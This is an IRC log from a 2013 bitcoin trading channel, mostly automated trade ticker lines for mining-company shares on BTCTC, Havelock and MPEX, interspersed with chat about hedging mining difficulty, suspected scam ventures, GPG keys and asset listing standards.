BTC [+] Aug 03 19:53:23 [BTCTC] [BASIC-MINING] 2 @ 0.4001 = 0.8002 BTC [-] Aug 03 19:53:43 well, i guess you failed with your expansion than :p Aug 03 19:54:46 [BTCTC] [BTCGARDEN] 45 @ 0.01772 = 0.7974 BTC [+] Aug 03 19:55:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.03878 = 0.0776 BTC [-] Aug 03 19:55:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.03877 = 0.3877 BTC [-] Aug 03 19:55:31 [BTCTC] [TAT.ASICMINER] 14 @ 0.03875 = 0.5425 BTC [-] Aug 03 19:55:32 [BTCTC] [TAT.ASICMINER] 24 @ 0.03874 = 0.9298 BTC [-] Aug 03 19:55:32 [BTCTC] [TAT.ASICMINER] 21 @ 0.03865 = 0.8117 BTC [-] Aug 03 19:55:49 [BTCTC] [TAT.ASICMINER] 4 @ 0.03864 = 0.1546 BTC [-] Aug 03 19:55:52 [BTCTC] [COGNITIVE] 1 @ 0.484 BTC [+] Aug 03 19:56:29 [HAVELOCK] [XBOND] 360 @ 0.001028 = 0.3701 BTC [-] Aug 03 19:56:34 [BTCTC] [BTCGARDEN] 55 @ 0.01772 = 0.9746 BTC [+] Aug 03 19:56:36 [BTCTC] [BTCGARDEN] 43 @ 0.01773 = 0.7624 BTC [+] Aug 03 19:56:37 [BTCTC] [BTCGARDEN] 52 @ 0.01773 = 0.922 BTC [+] Aug 03 19:57:13 [BTCTC] [BTCGARDEN] 10 @ 0.01773 = 0.1773 BTC [+] Aug 03 19:57:16 [BTCTC] [ASICMINER-PT] 1 @ 4.049 BTC [-] Aug 03 19:57:35 [BTCTC] [BTCGARDEN] 10 @ 0.01773 = 0.1773 BTC [+] Aug 03 19:57:43 [BTCTC] [BTCGARDEN] 3 @ 0.01773 = 0.0532 BTC [+] Aug 03 19:59:54 [BTCTC] [TAT.ASICMINER] 19 @ 0.03999 = 0.7598 BTC [+] Aug 03 20:00:58 [BTCTC] [ACTIVEMINING] 11 @ 0.005809 = 0.0639 BTC [+] Aug 03 20:01:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.03999 BTC [+] Aug 03 20:01:57 [BTCTC] [BTCGARDEN] 125 @ 0.01773 = 2.2163 BTC [+] Aug 03 20:01:58 [BTCTC] [BTCGARDEN] 10 @ 0.01773 = 0.1773 BTC [+] Aug 03 20:01:59 [BTCTC] [BTCGARDEN] 165 @ 0.01774 = 2.9271 BTC [+] Aug 03 20:02:39 [BTCTC] [DMS.MINING] 20 @ 0.009101 = 0.182 BTC [-] Aug 03 20:02:40 [BTCTC] [DMS.MINING] 4 @ 0.0091 = 0.0364 BTC [-] Aug 03 20:02:42 [BTCTC] [DMS.MINING] 4 @ 0.00906 = 0.0362 BTC [-] Aug 03 20:02:43 [BTCTC] [DMS.MINING] 73 @ 0.00905 = 0.6607 BTC [-] Aug 03 20:05:13 [BTCTC] [LABCOIN] 100 @ 0.00177 = 0.177 BTC [+] Aug 03 20:05:17 [BTCTC] [LABCOIN] 20 @ 0.001733 = 0.0347 BTC [-] Aug 03 20:05:19 [BTCTC] [LABCOIN] 929 @ 0.00173 = 1.6072 BTC [-] Aug 03 20:05:20 [BTCTC] [LABCOIN] 186 @ 0.00172 = 0.3199 BTC [-] Aug 03 20:05:21 [BTCTC] [LABCOIN] 10 @ 0.00171 = 0.0171 BTC [-] Aug 03 20:05:22 [BTCTC] [LABCOIN] 341 @ 0.001709 = 0.5828 BTC [-] Aug 03 20:05:24 [BTCTC] [LABCOIN] 150 @ 0.001707 = 0.2561 BTC [-] Aug 03 20:05:25 [BTCTC] [LABCOIN] 10 @ 0.001706 = 0.0171 BTC [-] Aug 03 20:05:26 [BTCTC] [LABCOIN] 75 @ 0.001706 = 0.128 BTC [-] Aug 03 20:05:27 [BTCTC] [LABCOIN] 7 @ 0.001706 = 0.0119 BTC [-] Aug 03 20:05:28 [BTCTC] [LABCOIN] 1061 @ 0.001705 = 1.809 BTC [-] Aug 03 20:06:03 [BTCTC] [BTCGARDEN] 250 @ 0.01774 = 4.435 BTC [+] Aug 03 20:06:27 [BTCTC] [BTCGARDEN] 20 @ 0.01774 = 0.3548 BTC [+] Aug 03 20:06:41 [BTCTC] [LABCOIN] 6 @ 0.001819 = 0.0109 BTC [+] Aug 03 20:11:12 [BTCTC] [LABCOIN] 6 @ 0.001706 = 0.0102 BTC [-] Aug 03 20:11:14 [BTCTC] [LABCOIN] 939 @ 0.001705 = 1.601 BTC [-] Aug 03 20:11:15 [BTCTC] [LABCOIN] 20 @ 0.001703 = 0.0341 BTC [-] Aug 03 20:11:17 [BTCTC] [LABCOIN] 20 @ 0.001702 = 0.034 BTC [-] Aug 03 20:11:18 [BTCTC] [LABCOIN] 2000 @ 0.001702 = 3.404 BTC [-] Aug 03 20:13:48 [BTCTC] [BTCGARDEN] 50 @ 0.01774 = 0.887 BTC [+] Aug 03 20:14:48 [BTCTC] [LABCOIN] 1 @ 0.001701 BTC [-] Aug 03 20:15:02 [BTCTC] [ASICMINER-PT] 1 @ 4.039 BTC [-] Aug 03 20:15:04 [BTCTC] [LABCOIN] 105 @ 0.001701 = 0.1786 BTC [-] Aug 03 20:15:41 [BTCTC] [LABCOIN] 640 @ 0.001702 = 1.0893 BTC [+] Aug 03 20:16:59 [HAVELOCK] [XBOND] 140 @ 0.001028 = 0.1439 BTC [-] Aug 03 20:17:28 [BTCTC] [ACTIVEMINING] 25 @ 0.005579 = 0.1395 BTC [-] Aug 03 20:19:13 [BTCTC] [BTCGARDEN] 8 @ 0.01774 = 0.1419 BTC [+] Aug 03 20:19:29 [HAVELOCK] [AM100] 1 @ 0.03849999 BTC [-] Aug 03 20:23:30 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.002978 = 0.0089 BTC [+] Aug 03 20:24:23 [HAVELOCK] [SMG] 76 @ 0.0002449 = 0.0186 BTC [+] Aug 03 20:32:06 [BTCTC] [ACTIVEMINING] 1 @ 0.005742 BTC [+] Aug 03 20:32:14 [BTCTC] [LABCOIN] 65 @ 0.001801 = 0.1171 BTC [+] Aug 03 20:33:01 [BTCTC] [COGNITIVE] 1 @ 0.47 BTC [-] Aug 03 20:33:46 [BTCTC] [LABCOIN] 2 @ 0.001806 = 0.0036 BTC [+] Aug 03 20:35:18 [BTCTC] [BTCGARDEN] 1 @ 0.0177 BTC [-] Aug 03 20:38:43 [BTCTC] [BTCGARDEN] 112 @ 0.0177 = 1.9824 BTC [-] Aug 03 20:38:54 [BTCTC] [BTCGARDEN] 6 @ 0.0177 = 0.1062 BTC [-] Aug 03 20:39:43 [BTCTC] [BTCGARDEN] 100 @ 0.01769 = 1.769 BTC [-] Aug 03 20:41:40 [BTCTC] [BTCGARDEN] 5 @ 0.01769 = 0.0885 BTC [-] Aug 03 20:42:44 [BTCTC] [LABCOIN] 80 @ 0.001803 = 0.1442 BTC [-] Aug 03 20:44:25 [HAVELOCK] [XBOND] 1 @ 0.001029 BTC [+] Aug 03 20:47:19 [BTCTC] [BTCGARDEN] 405 @ 0.01769 = 7.1645 BTC [-] Aug 03 20:49:49 [BTCTC] [ASICMINER-PT] 1 @ 4.039 BTC [-] Aug 03 20:54:40 [BTCTC] [ACTIVEMINING] 25 @ 0.005688 = 0.1422 BTC [-] Aug 03 20:54:41 [BTCTC] [ACTIVEMINING] 4 @ 0.005689 = 0.0228 BTC [+] Aug 03 20:58:55 mircea_popescu: http://trilema.com/2013/how-to-hedge-as-a-miner/ - how long until someone comes and is able to market make diff futures Aug 03 20:59:03 that icbit bucket shop is stupid Aug 03 20:59:38 well... i was talking to someone just yest. Aug 03 20:59:49 there was a mm a while back but things diodn't work out so well for him. Aug 03 20:59:52 [HAVELOCK] [SMG] 46 @ 0.0002449 = 0.0113 BTC [+] Aug 03 21:00:19 What is up with Bitcointalk? Aug 03 21:02:06 [HAVELOCK] [XBOND] 15 @ 0.001029 = 0.0154 BTC [+] Aug 03 21:02:21 what do you think the market needs for the diff futures market to mature like the options market? Aug 03 21:02:54 we can hedge price, but I've racked my brain over hedging on mining and it seems the answer to the question "how do I hedge mining" is "you don't" Aug 03 21:03:13 You invest in difficulty increasing. Aug 03 21:03:22 kleeck: how? Aug 03 21:03:30 DMS has an offering that is essentially that. Aug 03 21:03:35 I don't know the details. Aug 03 21:03:49 hmm Aug 03 21:03:56 2nd time I've heard that answer Aug 03 21:04:24 Ha. Yeah. I'm not interested. Maybe the market needs a true difficulty hedge that is easy to understand. "mining insurance"? Aug 03 21:11:11 hard to provide because it's harder to price than options which are difficult enough as is to price Aug 03 21:12:29 [BTCTC] [ACTIVEMINING] 1030 @ 0.005664 = 5.8339 BTC [-] Aug 03 21:12:39 [BTCTC] [BASIC-MINING] 1 @ 0.4004 BTC [+] Aug 03 21:12:41 [BTCTC] [BASIC-MINING] 2 @ 0.4001 = 0.8002 BTC [-] Aug 03 21:12:42 [BTCTC] [BASIC-MINING] 8 @ 0.4 = 3.2 BTC [-] Aug 03 21:13:58 !ticker m ^Oix Aug 03 21:14:00 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 65.75329814 / 65.75329814 / (2940 shares, 1,686.19 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Aug 03 21:14:04 !ticker m s.mpoe Aug 03 21:14:05 [MPEX:S.MPOE] 1D: 0.00082043 / 0.00082424 / 0.00082594 (163796 shares, 135.01 BTC), 7D: 0.0007936 / 0.0008102 / 0.00082594 (2178761 shares, 1,765.24 BTC), 30D: 0.0007725 / 0.00081931 / 0.00097228 (10607571 shares, 8,690.93 BTC) Aug 03 21:14:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.03907 BTC [-] Aug 03 21:14:11 [BTCTC] [TAT.ASICMINER] 12 @ 0.03906 = 0.4687 BTC [-] Aug 03 21:14:12 [BTCTC] [TAT.ASICMINER] 50 @ 0.03905 = 1.9525 BTC [-] Aug 03 21:14:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.03905 BTC [-] Aug 03 21:14:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.03901 = 0.078 BTC [-] Aug 03 21:14:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.039 = 0.39 BTC [-] Aug 03 21:14:17 [BTCTC] [TAT.ASICMINER] 6 @ 0.03865 = 0.2319 BTC [-] Aug 03 21:14:18 [BTCTC] [TAT.ASICMINER] 16 @ 0.03864 = 0.6182 BTC [-] Aug 03 21:14:40 !last S.MPOE Aug 03 21:14:41 Things which are alike, in nature, grow to look alike, and the speaking stones have lain a long time lookin' at the sun. Aug 03 21:14:45 !last m S.MPOE Aug 03 21:14:46 Last trade for S.MPOE on MPEX was at 0.00082509 BTC [+] Aug 03 21:16:08 how could one profit from rising diff? Aug 03 21:16:23 sell mining bonds Aug 03 21:16:35 sell mining equipment Aug 03 21:17:30 preorder mining equipment then resell it before it exists Aug 03 21:17:42 well, that's not necessary connected Aug 03 21:17:49 lol Aug 03 21:18:05 your mining equip will be less worth if diff rises Aug 03 21:18:25 i'm not saying it's the best way, but people do it Aug 03 21:18:27 and they profit Aug 03 21:18:34 If that's the case I should start up an ipo lol Aug 03 21:18:55 and preorder selling is just a speculation and somehow profits from lower diff also Aug 03 21:19:25 how can you sell mining bonds if you don't yet own them mr. ThickAsThieves ? Aug 03 21:19:49 you can't sell something you don't have unless someone lets you short sell :P Aug 03 21:19:56 use ipo money to pay divs Aug 03 21:20:05 well. that indeed could be a way Aug 03 21:20:10 [BTCTC] [BTCGARDEN] 5 @ 0.01748 = 0.0874 BTC [-] Aug 03 21:20:11 [BTCTC] [BTCGARDEN] 1050 @ 0.01749 = 18.3645 BTC [+] Aug 03 21:20:12 [BTCTC] [BTCGARDEN] 3 @ 0.01749 = 0.0525 BTC [+] Aug 03 21:20:19 use your other equity to back it Aug 03 21:20:25 however Aug 03 21:20:36 issuing mining bonds inst as easy these days Aug 03 21:20:47 i bet so Aug 03 21:20:55 these days you just make whole fake mining companies Aug 03 21:21:03 you gotta say youre making your own chip Aug 03 21:22:14 in all seriousness: do you really really think actm, lab and garden are scams? Aug 03 21:22:18 [BTCTC] [BTCGARDEN] 4 @ 0.0176 = 0.0704 BTC [+] Aug 03 21:22:20 yes Aug 03 21:22:36 if they arent, they may as well be Aug 03 21:22:55 they will all ship too late, and payout too little Aug 03 21:22:59 [BTCTC] [DMS.SELLING] 250 @ 0.025 = 6.25 BTC [+] Aug 03 21:23:00 [BTCTC] [DMS.SELLING] 26 @ 0.025 = 0.65 BTC [+] Aug 03 21:24:02 dont confuse that with me saying a day trader cant make money with them Aug 03 21:24:05 [BTCTC] [DMS.SELLING] 3 @ 0.0251 = 0.0753 BTC [+] Aug 03 21:24:06 [BTCTC] [DMS.SELLING] 191 @ 0.0252 = 4.8132 BTC [+] Aug 03 21:24:07 they can Aug 03 21:24:36 that's golden Aug 03 21:24:52 that's for sure Aug 03 21:26:56 [BTCTC] [TAT.ASICMINER] 4 @ 0.03984 = 0.1594 BTC [+] Aug 03 21:30:21 [BTCTC] [ACTIVEMINING] 1 @ 0.005808 BTC [+] Aug 03 21:32:22 [HAVELOCK] [XBOND] 288 @ 0.001029 = 0.2964 BTC [+] Aug 03 21:32:57 This Nasty Fans stuff is pretty funny Aug 03 21:33:16 https://bitfunder.com/asset/NastyFans Aug 03 21:33:21 [BTCTC] [BTCGARDEN] 300 @ 0.01767 = 5.301 BTC [+] Aug 03 21:33:22 BitFunder.Com - Join the crowd, every BIT helps Aug 03 21:33:44 thestringpuller i think it needs time. Aug 03 21:33:49 atm it's fucking insane with the movements. Aug 03 21:33:50 Hmm, Bitfunder needs a new tagline Aug 03 21:34:35 [BTCTC] [DMS.MINING] 26 @ 0.01 = 0.26 BTC [+] Aug 03 21:34:42 [BTCTC] [DMS.MINING] 20 @ 0.01 = 0.2 BTC [+] Aug 03 21:35:11 ThickAsThieves were you here back when he came in to like... i dunno, cuss me out as a pr exercise i guess Aug 03 21:35:39 i think it was like my first week Aug 03 21:35:43 in IRC Aug 03 21:35:46 [BTCTC] [DMS.MINING] 124 @ 0.01049 = 1.3008 BTC [+] Aug 03 21:35:50 i vaguely recall Aug 03 21:35:55 [BTCTC] [DMS.MINING] 4 @ 0.01049 = 0.042 BTC [+] Aug 03 21:35:58 assuming we're thinking of the same event Aug 03 21:36:09 aha Aug 03 21:36:13 mircea_popescu: are difficulty movements that much larger than the spring price movements? Aug 03 21:36:15 sounds bout right Aug 03 21:36:30 thestringpuller not necessarily, but miners don't have 50k spare btc laying around. Aug 03 21:36:34 [HAVELOCK] [XBOND] 167 @ 0.001029 = 0.1718 BTC [+] Aug 03 21:36:53 if you think about it, that's half of asicminer's total profits, and for that matter prolly > 10% of its entire profit over its entire lifetime forever. Aug 03 21:37:02 [BTCTC] [DMS.MINING] 22 @ 0.0105 = 0.231 BTC [+] Aug 03 21:37:08 [BTCTC] [LABCOIN] 404 @ 0.001801 = 0.7276 BTC [-] Aug 03 21:37:21 so ultimately you'll need someone with the spare capital to act as the anchor? Aug 03 21:37:30 yes. Aug 03 21:37:51 since i won'd do it myself cause i know shitall about mining, and nobody else does it basically because nobody else has the capital Aug 03 21:37:54 we're stuck waiting. Aug 03 21:37:58 > 1 year by now Aug 03 21:38:25 miners don't deserve hedging then Aug 03 21:38:27 [BTCTC] [ACTIVEMINING] 8 @ 0.005802 = 0.0464 BTC [-] Aug 03 21:39:03 well arguably they have much bigger problems atm. Aug 03 21:39:12 such as you know, buying gems. Aug 03 21:39:19 like being fucking scammors you mean? Aug 03 21:39:22 [HAVELOCK] [XBOND] 345 @ 0.001029 = 0.355 BTC [+] Aug 03 21:39:25 [HAVELOCK] [XBOND] 760 @ 0.001028 = 0.7813 BTC [-] Aug 03 21:39:39 BTCGARDEN should hire a futures expert and use their capital for something useful Aug 03 21:39:47 so mp, do you still disagree with me about setting better standards? Aug 03 21:39:50 [BTCTC] [LABCOIN] 50 @ 0.001801 = 0.0901 BTC [-] Aug 03 21:39:52 even for the play exchanges Aug 03 21:39:53 [BTCTC] [PAJKA.BOND] 1 @ 0.02608 BTC [+] Aug 03 21:41:33 [BTCTC] [LABCOIN] 2000 @ 0.001806 = 3.612 BTC [+] Aug 03 21:42:14 ThickAsThieves vote with your money Aug 03 21:42:17 mircea_popescu: All : the avatars here don.t use gravatar, instead look for an avatar.png file in your domain. << When you got a minute could you direct me a to a faq or something explaining that? Aug 03 21:42:21 you are voting for scams rite now Aug 03 21:42:23 good job Aug 03 21:44:30 [BTCTC] [BTCGARDEN] 10 @ 0.01763 = 0.1763 BTC [-] Aug 03 21:44:38 [BTCTC] [DMS.PURCHASE] 26 @ 0.03387 = 0.8806 BTC [-] Aug 03 21:45:42 thestringpuller it's simple. if you put in domain.com, the avatar is loaded from domain.com/avatar.png Aug 03 21:45:59 ThickAsThieves what was the disagreement ? Aug 03 21:46:52 [BTCTC] [LABCOIN] 16 @ 0.001751 = 0.028 BTC [-] Aug 03 21:47:05 I had run the idea by you to start work on BALS, the Bitcoin Asset Listing Standards Aug 03 21:47:08 [MPEX] [S.MPOE] 8003 @ 0.00082708 = 6.6191 BTC [+] Aug 03 21:47:23 as education/reference/spec Aug 03 21:47:30 [HAVELOCK] [LABCO] 100 @ 0.0022 = 0.22 BTC [+] Aug 03 21:47:44 to help the "play" exchanges and "investors" grow up Aug 03 21:48:14 of course you informed me this was a stupid waste of time Aug 03 21:48:24 i recall we discussing accounting standards and me saying just use an0 thats what its for Aug 03 21:48:24 unless it was for my own personal excercise Aug 03 21:48:43 [BTCTC] [ACTIVEMINING] 9 @ 0.005755 = 0.0518 BTC [-] Aug 03 21:48:47 what i'd said re an0 was to possibly include it Aug 03 21:48:54 Ah this good 'ol quote (speaking of scammors): .Shady ROMANIAN character opens up unregistered bitcoin options exchange (complete with HTML from 1993) on his personal website (which also hosts porn) and charges exorbitant fees just to join, while constantly accusing pretty much everyone else in the bitcoin community of being a scammer, and, along with his (possibly virtual) -PR lackey, acts like a loudmouthed douchebag . but apperantly scams no Aug 03 21:48:57 fleshing it out into a larger spec Aug 03 21:49:10 like a non-SRO Aug 03 21:49:29 you mean like gpg-contracts discussion ? Aug 03 21:49:38 hell maybe it turns into the bitocoin SRO Aug 03 21:49:38 [BTCTC] [LTC-ATF.B2] 1 @ 0.01009 BTC [-] Aug 03 21:49:45 like everything Aug 03 21:49:53 lol like everything, k Aug 03 21:50:33 obv not everything everything Aug 03 21:50:47 thestringpuller the funny part is, that quote's older than 2/3 of smidge's index. Aug 03 21:51:15 ThickAsThieves i can start to see where the "for your personal amusement" part could come in Aug 03 21:51:52 that is possibly enough for me in this case Aug 03 21:52:05 [BTCTC] [ACTIVEMINING] 16 @ 0.005755 = 0.0921 BTC [-] Aug 03 21:52:32 so go ahead. Aug 03 21:53:31 ok dont get mad if I bug you about it again then ;) Aug 03 21:54:03 do i ever get mad ? Aug 03 21:54:11 you got mad at Ukyo Aug 03 21:54:30 but no, not really Aug 03 21:54:40 mircea_popescu: didn't the idiots emailing you about the fees without reading the faq piss you off just a lil' bit? Aug 03 21:54:41 you're just SO mean Aug 03 21:54:55 (kidding) Aug 03 21:55:06 thestringpuller well... there was a rash of them, but it abated. Aug 03 21:55:20 now people just send mainkeys w/o encryption subkeys. Aug 03 21:55:32 XD Aug 03 21:55:56 [HAVELOCK] [XBOND] 100 @ 0.00102999 = 0.103 BTC [+] Aug 03 21:56:04 sounds like a real idiot Aug 03 21:56:09 [BTCTC] [BTCGARDEN] 10 @ 0.01725 = 0.1725 BTC [-] Aug 03 21:56:29 ThickAsThieves actually it's funny cause i had like 3 instances last month. Aug 03 21:56:37 i think teh gpg is really counterintuitive or something Aug 03 21:56:55 [BTCTC] [BTCGARDEN] 60 @ 0.0173 = 1.038 BTC [+] Aug 03 21:56:57 [BTCTC] [BTCGARDEN] 40 @ 0.01755 = 0.702 BTC [+] Aug 03 21:57:39 [BTCTC] [BTCGARDEN] 5 @ 0.01754 = 0.0877 BTC [-] Aug 03 21:58:08 now that it's working i love it Aug 03 21:58:16 i feel like a cyberpunk Aug 03 21:58:30 [BTCTC] [LABCOIN] 30 @ 0.00175 = 0.0525 BTC [-] Aug 03 21:58:30 mircea_popescu: I thought you could just register the main and subkeys to the WOT key list and just give out the fingerprint? Aug 03 21:59:25 a GUI would be nice though Aug 03 21:59:46 GPG GUIs actually confused me more than the command-line Aug 03 22:00:23 hint: geanypg, gpa Aug 03 22:00:49 [HAVELOCK] [LABCO] 4 @ 0.0022 = 0.0088 BTC [+] Aug 03 22:02:15 didn't know about GPA. trying Aug 03 22:03:41 [HAVELOCK] [XBOND] 1 @ 0.00102999 BTC [+] Aug 03 22:04:37 thestringpuller nah you have to email the pubkey Aug 03 22:05:03 im a fucking baller in EVE. Aug 03 22:05:10 past hour like 400mn worth of sales. Aug 03 22:05:24 test alliance, best alliance Aug 03 22:06:59 [HAVELOCK] [AM100] 5 @ 0.0372 = 0.186 BTC [-] Aug 03 22:07:25 Lol. I'm waiting for 1BTC to go to war to get back in my capsule. Aug 03 22:08:52 [HAVELOCK] [XBOND] 160 @ 0.00102999 = 0.1648 BTC [+] Aug 03 22:11:37 [HAVELOCK] [AM100] 1 @ 0.03680001 BTC [-] Aug 03 22:11:40 [HAVELOCK] [AM100] 1 @ 0.0368 BTC [-] Aug 03 22:11:41 [HAVELOCK] [AM100] 2 @ 0.03660011 = 0.0732 BTC [-] Aug 03 22:11:43 [HAVELOCK] [AM100] 1 @ 0.0366001 BTC [-] Aug 03 22:11:45 [HAVELOCK] [AM100] 10 @ 0.0366 = 0.366 BTC [-] Aug 03 22:11:48 [HAVELOCK] [AM100] 26 @ 0.0365 = 0.949 BTC [-] Aug 03 22:11:50 [HAVELOCK] [AM100] 1 @ 0.0365 BTC [-] Aug 03 22:11:52 [HAVELOCK] [AM100] 11 @ 0.0365 = 0.4015 BTC [-] Aug 03 22:11:54 [HAVELOCK] [AM100] 3 @ 0.0364 = 0.1092 BTC [-] Aug 03 22:11:56 [HAVELOCK] [AM100] 93 @ 0.0360001 = 3.348 BTC [-] Aug 03 22:11:58 [HAVELOCK] [AM100] 6 @ 0.036 = 0.216 BTC [-] Aug 03 22:12:00 [HAVELOCK] [AM100] 1 @ 0.036 BTC [-] Aug 03 22:12:02 [HAVELOCK] [AM100] 1 @ 0.036 BTC [-] Aug 03 22:12:03 [HAVELOCK] [AM100] 99 @ 0.03590101 = 3.5542 BTC [-] Aug 03 22:12:05 [HAVELOCK] [AM100] 1 @ 0.0359 BTC [-] Aug 03 22:12:07 [HAVELOCK] [AM100] 1 @ 0.0352 BTC [-] Aug 03 22:12:09 [HAVELOCK] [AM100] 2 @ 0.035 = 0.07 BTC [-] Aug 03 22:12:11 [HAVELOCK] [AM100] 1 @ 0.035 BTC [-] Aug 03 22:12:13 [HAVELOCK] [AM100] 1 @ 0.035 BTC [-] Aug 03 22:12:16 [HAVELOCK] [AM100] 99 @ 0.03490101 = 3.4552 BTC [-] Aug 03 22:12:18 [HAVELOCK] [AM100] 163 @ 0.0344001 = 5.6072 BTC [-] Aug 03 22:12:20 [HAVELOCK] [AM100] 476 @ 0.0344 = 16.3744 BTC [-] Aug 03 22:13:01 lewicki nowai. 1btc ftw. Aug 03 22:14:04 [BTCTC] [ACTIVEMINING] 21 @ 0.005754 = 0.1208 BTC [-] Aug 03 22:17:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.03873 = 0.1162 BTC [-] Aug 03 22:17:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.03872 BTC [-] Aug 03 22:17:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.03865 = 0.116 BTC [-] Aug 03 22:17:32 [BTCTC] [TAT.ASICMINER] 68 @ 0.03864 = 2.6275 BTC [-] Aug 03 22:17:33 [BTCTC] [TAT.ASICMINER] 4 @ 0.0383 = 0.1532 BTC [-] Aug 03 22:17:34 [BTCTC] [TAT.ASICMINER] 4 @ 0.0382 = 0.1528 BTC [-] Aug 03 22:17:35 [BTCTC] [TAT.ASICMINER] 30 @ 0.038 = 1.14 BTC [-] Aug 03 22:17:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.038 = 0.38 BTC [-] Aug 03 22:17:37 [BTCTC] [TAT.ASICMINER] 60 @ 0.038 = 2.28 BTC [-] Aug 03 22:17:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.038 = 0.076 BTC [-] Aug 03 22:18:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.03873 = 0.1162 BTC [+] Aug 03 22:18:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.037 = 0.296 BTC [-] Aug 03 22:18:30 [BTCTC] [TAT.ASICMINER] 25 @ 0.037 = 0.925 BTC [-] Aug 03 22:18:30 [BTCTC] [TAT.ASICMINER] 33 @ 0.03686 = 1.2164 BTC [-] Aug 03 22:18:31 [BTCTC] [TAT.ASICMINER] 34 @ 0.0367 = 1.2478 BTC [-] Aug 03 22:18:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.0366 = 0.366 BTC [-] Aug 03 22:18:34 [BTCTC] [TAT.ASICMINER] 30 @ 0.0366 = 1.098 BTC [-] Aug 03 22:18:35 [BTCTC] [TAT.ASICMINER] 4 @ 0.03652 = 0.1461 BTC [-] Aug 03 22:18:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.0365 BTC [-] Aug 03 22:18:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.03611 BTC [-] Aug 03 22:18:40 [BTCTC] [TAT.ASICMINER] 15 @ 0.03611 = 0.5417 BTC [-] Aug 03 22:18:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.0361 = 0.0722 BTC [-] Aug 03 22:18:43 [BTCTC] [TAT.ASICMINER] 71 @ 0.0361 = 2.5631 BTC [-] Aug 03 22:21:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.03613 BTC [+] Aug 03 22:21:50 [BTCTC] [LABCOIN] 9 @ 0.001841 = 0.0166 BTC [+] Aug 03 22:21:51 [BTCTC] [LABCOIN] 50 @ 0.001842 = 0.0921 BTC [+] Aug 03 22:21:52 [BTCTC] [LABCOIN] 10 @ 0.001843 = 0.0184 BTC [+] Aug 03 22:21:53 [BTCTC] [LABCOIN] 71 @ 0.001844 = 0.1309 BTC [+] Aug 03 22:21:55 [BTCTC] [LABCOIN] 30 @ 0.001845 = 0.0554 BTC [+] Aug 03 22:21:56 [BTCTC] [LABCOIN] 400 @ 0.001846 = 0.7384 BTC [+] Aug 03 22:21:57 [BTCTC] [LABCOIN] 16 @ 0.001848 = 0.0296 BTC [+] Aug 03 22:21:58 [BTCTC] [LABCOIN] 100 @ 0.001849 = 0.1849 BTC [+] Aug 03 22:21:59 [BTCTC] [LABCOIN] 466 @ 0.001898 = 0.8845 BTC [+] Aug 03 22:21:59 [BTCTC] [LABCOIN] 326 @ 0.001899 = 0.6191 BTC [+] Aug 03 22:22:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.03612 BTC [-] Aug 03 22:22:33 [BTCTC] [BTCGARDEN] 2 @ 0.01725 = 0.0345 BTC [-] Aug 03 22:23:29 [BTCTC] [LABCOIN] 475 @ 0.001899 = 0.902 BTC [+] Aug 03 22:24:09 [BTCTC] [LABCOIN] 1000 @ 0.0019 = 1.9 BTC [+] Aug 03 22:24:10 [BTCTC] [LABCOIN] 500 @ 0.0019 = 0.95 BTC [+] Aug 03 22:28:54 [BTCTC] [LABCOIN] 73 @ 0.001898 = 0.1386 BTC [-] Aug 03 22:33:21 [HAVELOCK] [XBOND] 5 @ 0.00102999 = 0.0051 BTC [+] Aug 03 22:33:34 [BTCTC] [BTCGARDEN] 25 @ 0.01701 = 0.4253 BTC [-] Aug 03 22:34:02 [BTCTC] [BTCGARDEN] 43 @ 0.01701 = 0.7314 BTC [-] Aug 03 22:35:38 [BTCTC] [LABCOIN] 43 @ 0.001899 = 0.0817 BTC [+] Aug 03 22:35:53 [HAVELOCK] [AM100] 20 @ 0.03421 = 0.6842 BTC [-] Aug 03 22:36:32 [HAVELOCK] [XBOND] 157 @ 0.00102999 = 0.1617 BTC [+] Aug 03 22:38:42 [BTCTC] [COGNITIVE] 10 @ 0.4838 = 4.838 BTC [+] Aug 03 22:39:33 I'm thinking about dividing my shares among multiple BF accounts for extra security against hacking/etc. Does anyone know if tendering shares to a separate account takes place instantly or will there be a delay to worry about? Aug 03 22:40:27 [BTCTC] [LABCOIN] 1 @ 0.0019 BTC [+] Aug 03 22:44:04 [BTCTC] [BTCGARDEN] 1 @ 0.01725 BTC [+] Aug 03 22:44:35 [HAVELOCK] [AM100] 17 @ 0.0342 = 0.5814 BTC [-] Aug 03 22:45:02 [BTCTC] [LABCOIN] 1 @ 0.001899 BTC [-] Aug 03 22:45:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.03959 = 0.0792 BTC [+] Aug 03 22:45:46 [HAVELOCK] [HIM] 2 @ 0.142 = 0.284 BTC [+] Aug 03 22:46:09 AM is going really low :/ Aug 03 22:46:19 I don't know if I should buy this time though Aug 03 22:46:26 [HAVELOCK] [LABCO] 110 @ 0.002 = 0.22 BTC [-] Aug 03 22:47:04 iamnot_ it's instant Aug 03 22:47:10 [HAVELOCK] [XBOND] 450 @ 0.001047 = 0.4712 BTC [+] Aug 03 22:47:27 Thanks! Aug 03 22:47:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.03698 = 0.074 BTC [-] Aug 03 22:48:15 [BTCTC] [BFMINES] 3 @ 0.004 = 0.012 BTC [+] Aug 03 22:49:37 http://www.theverge.com/2013/8/3/4585700/president-obama-vetoes-samsung-patent-ban-on-iphone-4-and-select-ipads Aug 03 22:49:39 President Obama vetoes Samsung patent ban on iPhone 4 and select iPads | The Verge Aug 03 22:50:24 